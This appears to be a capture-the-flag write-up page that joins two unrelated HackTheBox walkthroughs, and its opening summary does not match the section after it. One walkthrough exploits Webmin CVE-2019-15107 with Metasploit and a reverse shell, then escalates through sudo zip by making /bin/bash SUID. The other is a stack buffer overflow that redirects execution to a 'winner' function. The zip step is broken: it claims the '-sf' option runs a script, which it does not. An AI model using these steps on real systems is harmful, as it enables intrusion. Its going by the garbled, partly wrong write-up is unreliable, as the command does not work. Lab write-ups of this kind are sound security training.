We covered another example of a vulnerable binary to buffer overflow vulnerability. The binary has NX enabled to prevent code execution in the stack but our goal was to control the execution flow and redirect it to the “winner” function to print the flag. We generated a pattern to cause a segmentation fault then we used the address of the “winner” function so that the RIP register points to it after it hits the segmentation fault. This was part of HackTheBox Reg Intro to Binary Exploitation track.
Initial Enumeration
I started with an Nmap scan of the target machine, which revealed two open ports: 22 (SSH) and 10000 (HTTP). The HTTP service on port 10000 was running Webmin, a web-based system configuration tool for Unix-like systems. I then browsed to the Webmin interface
Webmin Exploitation
I attempted to log into Webmin with default credentials, but they didn’t work. I then searched for Webmin exploits and found a remote code execution (RCE) vulnerability (CVE-2019-15107) affecting Webmin versions 1.890 through 1.920. This vulnerability allowed an attacker to execute arbitrary commands by manipulating the old
parameter in the password reset functionality.
To exploit this, I used Metasploit. I searched for the relevant module, set the target host and port, and configured the payload to be a reverse shell. I also set my local host and port for the listener. After running the exploit, I successfully obtained a Meterpreter session.
Post-Exploitation and User Flag
Once I had the Meterpreter session, I used the shell
command to get a command-line interface on the target machine. I navigated to the /home
directory, then into the logan
user’s directory. There, I found the user flag in user.txt
.
Privilege Escalation
To escalate privileges to root, I first checked the current user’s privileges using sudo -l
. I found that the logan
user could run /usr/bin/zip
as root without a password. This is a common misconfiguration that can lead to privilege escalation.
I then searched for GTFOBins for zip
to find a way to exploit this. GTFOBins provides a curated list of Unix binaries that can be used to bypass local security restrictions. The zip
entry showed a method to execute arbitrary commands as root using the -sf
option in conjunction with a crafted file.
I created a simple shell script named shell.sh
that would change the permissions of the /bin/bash
executable to SUID, effectively giving me a root shell. I then used the zip
command with sudo
and the -sf
option to execute my shell.sh
script. After running the command, I executed /bin/bash -p
to get a root shell.
Finally, I navigated to the /root
directory and retrieved the root flag from root.txt
.
Technical Commands
nmap -sC -sV <target_ip>
msfconsole
search webmin
use exploit/linux/http/webmin_backdoor
set RHOSTS <target_ip>
set RPORT 10000
set LHOST <your_ip>
set LPORT 4444
run
shell
(within Meterpreter)cd /home/logan
cat user.txt
sudo -l
echo 'chmod +s /bin/bash' > shell.sh
sudo /usr/bin/zip -sf shell.sh
/bin/bash -p
cd /root
cat root.txt
In this video, I demonstrated how to exploit a binary vulnerable to buffer overflow using Radare2 and GDB.
Initial Analysis with Radare2
I started by analyzing the provided binary file named “rig” using Radare2. I used the command aaa
to analyze the binary and afl
to list the functions. I identified several functions, including main
, gets
, puts
, and a particularly interesting one called winner
. I suspected that the winner
function might be responsible for displaying the flag. I also used iz
to list strings within the binary, which revealed strings like “Congratulations”, “flag”, “Enter your name”, and “Registered”. I used ie
to get the entry point of the main function and iM
to get the main function address.
nvestigating the winner
Function
I used the command s sym.winner
to seek to the winner
function and pdf
to disassemble it. The disassembly confirmed that the winner
function indeed opens a file named “flag.txt”. I then checked if the main
function calls the winner
function. I used s sym.main
and pdf
to disassemble main
. I found that main
only calls a function named run
. Disassembling the run
function (s sym.run
and pdf
) showed that it uses gets
to take user input, which is a known vulnerability for buffer overflows. It did not call the winner
function.
Confirming Buffer Overflow Vulnerability
I ran the binary and provided a long string of ‘A’s (100 ‘A’s) as input. This caused a segmentation fault, confirming the buffer overflow vulnerability.
Finding the Offset with GDB
I switched to GDB (GNU Debugger) to find the exact offset needed to overwrite the instruction pointer. I used pattern create 100
to generate a unique pattern of 100 bytes. I ran the binary within GDB (run <pattern>
) and observed the segmentation fault. I then used pattern search
with the bytes found in the stack pointer or base pointer to determine the offset. The offset was found to be 56 bytes.
Crafting the Exploit
I determined that since NX (Non-eXecutable stack) was enabled (checked using checksec rig
), I couldn’t directly execute shellcode on the stack. Instead, the goal was to redirect the execution flow to the winner
function. I needed the memory address of the winner
function, which I obtained earlier using Radare2 (afl
). I created a Python script (exploit.py
) to generate the payload. The payload consisted of 56 bytes of ‘A’s, followed by the memory address of the winner
function (in little-endian format).
Executing the Exploit
I executed the Python script and piped its output to the vulnerable binary running on the remote instance. This successfully overwrote the return address on the stack with the address of the winner
function. As a result, the winner
function was executed, which opened “flag.txt” and displayed its contents.
Technical Commands Used
ls
file rig
r2 rig
aaa
afl
python3 -c "print('A'*100)"
./rig
iz
ie
iM
s sym.winner
pdf
q
V
v
s sym.main
s sym.run
checksec rig
gdb rig
pattern create 100
run <pattern>
pattern search <bytes_from_register>
pattern offset <bytes_from_register>
exit
clear
cat exploit.py
python exploit.py | nc <host> <port>
Video Walkthrough